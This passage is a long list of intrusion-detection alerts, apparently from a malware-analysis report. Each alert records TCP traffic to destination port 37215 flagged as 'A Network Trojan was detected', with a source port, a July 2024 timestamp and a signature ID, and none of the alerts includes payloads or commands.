                  Source Port:59916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835247
                  SID:2835222
                  Source Port:55176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027188
                  SID:2829579
                  Source Port:49700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2829579
                  Source Port:43442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2829579
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.169661
                  SID:2835222
                  Source Port:51232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.023576
                  SID:2829579
                  Source Port:39788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.929002
                  SID:2829579
                  Source Port:33356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2835222
                  Source Port:55390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990906
                  SID:2835222
                  Source Port:60724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2829579
                  Source Port:52178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852846
                  SID:2829579
                  Source Port:45210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191147
                  SID:2835222
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985178
                  SID:2829579
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683297
                  SID:2835222
                  Source Port:55166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2829579
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2835222
                  Source Port:52262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.085617
                  SID:2829579
                  Source Port:34546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2829579
                  Source Port:43438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2829579
                  Source Port:51656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523896
                  SID:2835222
                  Source Port:51324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:49846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2829579
                  Source Port:34844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509281
                  SID:2835222
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2835222
                  Source Port:56048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.439242
                  SID:2829579
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2835222
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011299
                  SID:2829579
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558808
                  SID:2835222
                  Source Port:59410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.599679
                  SID:2835222
                  Source Port:40220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2835222
                  Source Port:55634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.025097
                  SID:2829579
                  Source Port:54210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514103
                  SID:2829579
                  Source Port:56680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.901357
                  SID:2835222
                  Source Port:45262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805971
                  SID:2835222
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.804220
                  SID:2829579
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151496
                  SID:2829579
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373846
                  SID:2829579
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2829579
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2835222
                  Source Port:41582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.198255
                  SID:2835222
                  Source Port:52446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869388
                  SID:2835222
                  Source Port:54876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825093
                  SID:2829579
                  Source Port:41386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2829579
                  Source Port:39712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:56428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.674320
                  SID:2829579
                  Source Port:40030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2835222
                  Source Port:39118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651235
                  SID:2829579
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2835222
                  Source Port:43312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.745015
                  SID:2835222
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.305234
                  SID:2835222
                  Source Port:43436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652224
                  SID:2829579
                  Source Port:43164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.944917
                  SID:2835222
                  Source Port:49870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2835222
                  Source Port:59328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734254
                  SID:2835222
                  Source Port:56478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2829579
                  Source Port:46824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807455
                  SID:2835222
                  Source Port:56600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108287
                  SID:2829579
                  Source Port:46026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2829579
                  Source Port:47192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2835222
                  Source Port:49510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.841961
                  SID:2835222
                  Source Port:58750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.193253
                  SID:2829579
                  Source Port:52076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016890
                  SID:2835222
                  Source Port:53500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849785
                  SID:2835222
                  Source Port:48208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2829579
                  Source Port:40304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2835222
                  Source Port:50346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.339416
                  SID:2829579
                  Source Port:52726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2829579
                  Source Port:40790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2835222
                  Source Port:43496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853366
                  SID:2835222
                  Source Port:41218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2835222
                  Source Port:58914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2835222
                  Source Port:48276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2835222
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2835222
                  Source Port:52040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560670
                  SID:2835222
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.754688
                  SID:2829579
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2835222
                  Source Port:38344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2835222
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2829579
                  Source Port:48046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2835222
                  Source Port:52072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858543
                  SID:2835222
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360757
                  SID:2829579
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2829579
                  Source Port:57140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2829579
                  Source Port:53698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.914560
                  SID:2835222
                  Source Port:56286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.140498
                  SID:2835222
                  Source Port:50892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.780604
                  SID:2829579
                  Source Port:45780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529373
                  SID:2829579
                  Source Port:57164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2829579
                  Source Port:52584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2835222
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.841867
                  SID:2835222
                  Source Port:33816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427653
                  SID:2835222
                  Source Port:38070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352800
                  SID:2829579
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2829579
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.892178
                  SID:2835222
                  Source Port:44404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.985761
                  SID:2835222
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528499
                  SID:2835222
                  Source Port:34244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.713001
                  SID:2835222
                  Source Port:34484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.059656
                  SID:2835222
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.880964
                  SID:2829579
                  Source Port:37438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808905
                  SID:2829579
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608580
                  SID:2829579
                  Source Port:56718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:46108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.386314
                  SID:2835222
                  Source Port:52544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.616142
                  SID:2829579
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2829579
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098599
                  SID:2829579
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472766
                  SID:2829579
                  Source Port:33378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2829579
                  Source Port:58286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988171
                  SID:2835222
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2829579
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358828
                  SID:2835222
                  Source Port:47294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.985379
                  SID:2829579
                  Source Port:33048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827027
                  SID:2835222
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.948399
                  SID:2829579
                  Source Port:59734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:51888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.301300
                  SID:2829579
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.817964
                  SID:2829579
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2829579
                  Source Port:43334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409717
                  SID:2829579
                  Source Port:55818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2835222
                  Source Port:52374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932017
                  SID:2829579
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.181070
                  SID:2829579
                  Source Port:55362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2835222
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207017
                  SID:2835222
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646424
                  SID:2835222
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198870
                  SID:2835222
                  Source Port:45238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2829579
                  Source Port:54290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2829579
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2829579
                  Source Port:55254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083408
                  SID:2829579
                  Source Port:43228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2829579
                  Source Port:42686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.885713
                  SID:2835222
                  Source Port:58540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2829579
                  Source Port:41202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.732264
                  SID:2835222
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2835222
                  Source Port:56790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509874
                  SID:2835222
                  Source Port:34450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.663652
                  SID:2829579
                  Source Port:38886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.387437
                  SID:2835222
                  Source Port:33574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2835222
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2835222
                  Source Port:55748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878345
                  SID:2829579
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019858
                  SID:2835222
                  Source Port:46160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071295
                  SID:2835222
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.630985
                  SID:2835222
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.334232
                  SID:2835222
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201607
                  SID:2835222
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267157
                  SID:2829579
                  Source Port:34904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2829579
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.454576
                  SID:2835222
                  Source Port:33810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:40002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.566830
                  SID:2835222
                  Source Port:41948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2835222
                  Source Port:46288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2835222
                  Source Port:38614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118425
                  SID:2829579
                  Source Port:51500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2829579
                  Source Port:45248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2835222
                  Source Port:51108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272615
                  SID:2829579
                  Source Port:39788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093189
                  SID:2829579
                  Source Port:51094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237344
                  SID:2835222
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252438
                  SID:2835222
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135009
                  SID:2835222
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.393770
                  SID:2835222
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926952
                  SID:2829579
                  Source Port:49422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2829579
                  Source Port:57610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2835222
                  Source Port:59608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.512950
                  SID:2835222
                  Source Port:53088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368939
                  SID:2835222
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812421
                  SID:2829579
                  Source Port:59470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.670311
                  SID:2835222
                  Source Port:58562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.997295
                  SID:2835222
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2835222
                  Source Port:40376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.932335
                  SID:2835222
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2829579
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.483820
                  SID:2829579
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2829579
                  Source Port:59580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.602276
                  SID:2829579
                  Source Port:57918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2829579
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.533375
                  SID:2835222
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190813
                  SID:2835222
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:46380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.335498
                  SID:2829579
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
